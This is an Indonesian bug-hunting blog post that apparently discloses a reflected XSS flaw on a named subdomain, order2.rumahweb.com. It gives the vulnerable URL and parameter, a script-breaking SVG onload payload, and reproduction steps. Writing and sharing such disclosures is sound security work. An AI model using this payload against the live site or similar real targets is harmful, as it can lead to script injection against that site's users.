Reflected XSS On Search Domain [ Rumahweb.com ]

Learn System Security - Halo sobat whitehat, kali ini saya akan sedikit menceritakan bug Reflected XSS yang ada di situs rumahweb.com.

Bug Reflected XSS ini terletak pada subdomain Rumahweb, yaitu order2.rumahweb.com.

Vulnerability url & parameter : https://order2.rumahweb.com/?domain=
Payload : ");</script><svg/onload=alert(document.domain)>
Langkah langkah reproduksi :
- Yang pertama buka https://order2.rumahweb.com/?domain= pada browser kalian.
- Lalu masukkan Payload setelah url tersebut https://order2.rumahweb.com/?domain=");</script><svg/onload=alert(document.domain)>
- Dan kalian akan mendapati Reflected XSS pada halaman tersebut, seperti screenshot dibawah ini.

Itu tadi sedikit berbagi bug bersama saya, semoga saja Bug Reflected XSS ini segera diperbaiki oleh pihak pengelola website tersebut.

Sekian dari saya, Happy Bug Hunting and thanks for come here.

Reflected XSS On Search Domain [ Rumahweb.com ]

0 comments

Popular Posts

Pages

Label

Reflected XSS On Search Domain [ Rumahweb.com ]

Share this Article

Subscribe via Email

Related Post

0 comments

Popular Posts